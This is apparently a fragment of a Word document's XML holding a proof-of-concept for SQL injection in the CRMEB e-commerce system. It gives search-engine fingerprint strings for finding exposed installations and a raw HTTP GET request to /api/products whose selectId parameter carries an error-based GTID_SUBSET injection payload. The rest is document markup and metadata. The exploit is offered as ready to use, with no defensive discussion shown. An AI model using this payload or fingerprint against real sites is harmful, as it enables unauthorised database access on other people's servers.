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217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76A27655">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header="OfficeWeb365" || body="请输入furl参数"body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E35E3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F8C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654D46">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>GET /api/products?limit=20&amp;priceOrder=&amp;salesOrder=&amp;selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,version()))),0x7e),3550) HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52D56DB6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Host:</w:t>
            </w:r>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
          <w:p w14:paraId="4D77FEED">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F4CDDE3">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept-Encoding: gzip, deflate</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AC17D6A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A9E5D3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Connection: keep-alive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11D8EC97"/>
    <w:p w14:paraId="33C2864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E6B247B"/>
    <w:rsid w:val="0FF7FEA5"/>
    <w:rsid w:val="13DFAD20"/>
    <w:rsid w:val="1785A926"/>
    <w:rsid w:val="17E55D5F"/>
    <w:rsid w:val="1A635C3D"/>
    <w:rsid w:val="1B97CA72"/>
    <w:rsid w:val="1E7A3B29"/>
    <w:rsid w:val="1F5F8E86"/>
    <w:rsid w:val="1F9F2A16"/>
    <w:rsid w:val="1FF3D49F"/>
    <w:rsid w:val="1FFF89E9"/>
    <w:rsid w:val="299F9458"/>
    <w:rsid w:val="29F99800"/>
    <w:rsid w:val="2A18714D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9276AFA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5194C57"/>
    <w:rsid w:val="48D5008D"/>
    <w:rsid w:val="49E73956"/>
    <w:rsid w:val="4BE62113"/>
    <w:rsid w:val="4F147DB1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671392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56</Characters>
  <Lines>0</Lines>
  <Paragraphs>0</Paragraphs>
  <TotalTime>1</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>56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2024-06-18T06:00:12Z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